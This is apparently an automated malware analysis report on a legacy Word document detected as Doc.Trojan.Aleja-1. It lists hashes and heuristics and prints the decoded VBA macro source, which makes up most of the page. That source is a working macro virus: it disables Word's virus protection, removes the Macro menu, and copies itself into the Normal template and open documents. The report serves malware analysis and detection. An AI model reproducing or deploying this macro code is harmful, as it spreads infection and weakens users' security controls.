Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eaa4ba9f6a153c2f…

MALICIOUS

Office (OLE)

52.5 KB Created: 1995-03-02 14:58:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 38c85b7463e9e29f29d17443432db804 SHA-1: c68c43c04a6e01b8d180020549cc8e115c55d89a SHA-256: eaa4ba9f6a153c2f1f10e35243c55f4b1e940b963ff639f0e3a4f4bb04c3a014
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing VBA macros. The AutoClose and AutoOpen macros are designed to copy themselves to the Normal template and the active document, a common persistence technique. The ClamAV detection 'Doc.Trojan.Aleja-1' further confirms its malicious nature. The VBA code attempts to ensure its presence by copying modules like 'AutoClose', 'AutoOpen', 'ArchivoGuardar', 'ArchivoGuardarComo', 'ArchivoImprimir', and 'ArchivoImprimirPredeter' to both the Normal template and the active document.

Heuristics 5

  • ClamAV: Doc.Trojan.Aleja-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Aleja-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7779 bytes
SHA-256: 1dbd3553e1e63aacf2d9f9a52f4bc05be8bc9e24dd4f0be6c95c82cf0327bcc3
Detection
ClamAV: Doc.Trojan.Aleja-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoClose"
Sub MAIN()

On Error Resume Next


Options.VirusProtection = False
CommandBars("Tools").Controls("Macro").Delete


Dim modulo(6) As String
Dim n As Integer

Version = GetSetting(appname:="Aleja5", Section:="Inicio", _
                       Key:="Version", Default:="2")

If Version <= 2 Then

SaveSetting appname:="Aleja5", Section:="Inicio", _
                Key:="Version", setting:=2



n = 6
modulo(1) = "AutoClose"
modulo(2) = "AutoOpen"
modulo(3) = "ArchivoGuardar"
modulo(4) = "ArchivoGuardarComo"
modulo(5) = "ArchivoImprimir"
modulo(6) = "ArchivoImprimirPredeter"



For m = 1 To n

existe = False

For Each VBComponent In NormalTemplate.VBProject.VBComponents
    
    If VBComponent.Name = modulo(m) Then
            existe = True
    End If
Next VBComponent

If Not existe Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
            Destination:=NormalTemplate.FullName, Name:=modulo(m), _
            Object:=wdOrganizerObjectProjectItems
End If

existe = False

For Each VBComponent In ActiveDocument.VBProject.VBComponents
    
    If VBComponent.Name = modulo(m) Then
            existe = True
    End If
Next VBComponent

If Not existe Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, _
            Destination:=ActiveDocument.FullName, Name:=modulo(m), _
            Object:=wdOrganizerObjectProjectItems
End If

Next

End If

End Sub


Attribute VB_Name = "AutoOpen"
Sub MAIN()

On Error Resume Next



Options.VirusProtection = False
CommandBars("Tools").Controls("Macro").Delete

Dim modulo(6) As String
Dim n As Integer

Version = GetSetting(appname:="Aleja5", Section:="Inicio", _
                       Key:="Version", Default:="2")

If Version <= 2 Then

SaveSetting appname:="Aleja5", Section:="Inicio", _
                Key:="Version", setting:=2



n = 6
modulo(1) = "AutoClose"
modulo(2) = "AutoOpen"
modulo(3) = "ArchivoGuardar"
modulo(4) = "ArchivoGuardarComo"
modulo(5) = "ArchivoImprimir"
modulo(6) = "ArchivoImprimirPredeter"


For m = 1 To n

existe = False

For Each VBComponent In NormalTemplate.VBProject.VBComponents
    
    If VBComponent.Name = modulo(m) Then
            existe = True
    End If
Next VBComponent

If Not existe Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
            Destination:=NormalTemplate.FullName, Name:=modulo(m), _
            Object:=wdOrganizerObjectProjectItems
End If

existe = False

For Each VBComponent In ActiveDocument.VBProject.VBComponents
    
    If VBComponent.Name = modulo(m) Then
            existe = True
    End If
Next VBComponent

If Not existe Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, _
            Destination:=ActiveDocument.FullName, Name:=modulo(m), _
            Object:=wdOrganizerObjectProjectItems
End If

Next



Documents.Save NoPrompt:=True, OriginalFormat:=wdWordDocument

End If


End Sub


Attribute VB_Name = "ArchivoGuardar"

Sub MAIN()

On Error Resume Next

Options.VirusProtection = False
CommandBars("Tools").Controls("Macro").Delete

Dim modulo(6) As String
Dim n As Integer


Version = GetSetting(appname:="Aleja5", Section:="Inicio", _
                       Key:="Version", Default:="2")

If Version <= 2 Then

SaveSetting appname:="Aleja5", Section:="Inicio", _
                Key:="Version", setting:=2


n = 6
modulo(1) = "AutoClose"
modulo(2) = "AutoOpen"
modulo(3) = "ArchivoGuardar"
modulo(4) = "ArchivoGuardarComo"
modulo(5) = "ArchivoImprimir"
modulo(6) = "ArchivoImprimirPredeter"


For m = 1 To n


existe = False

For Each VBComponent In ActiveDocument.VBProject.VBComponent
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.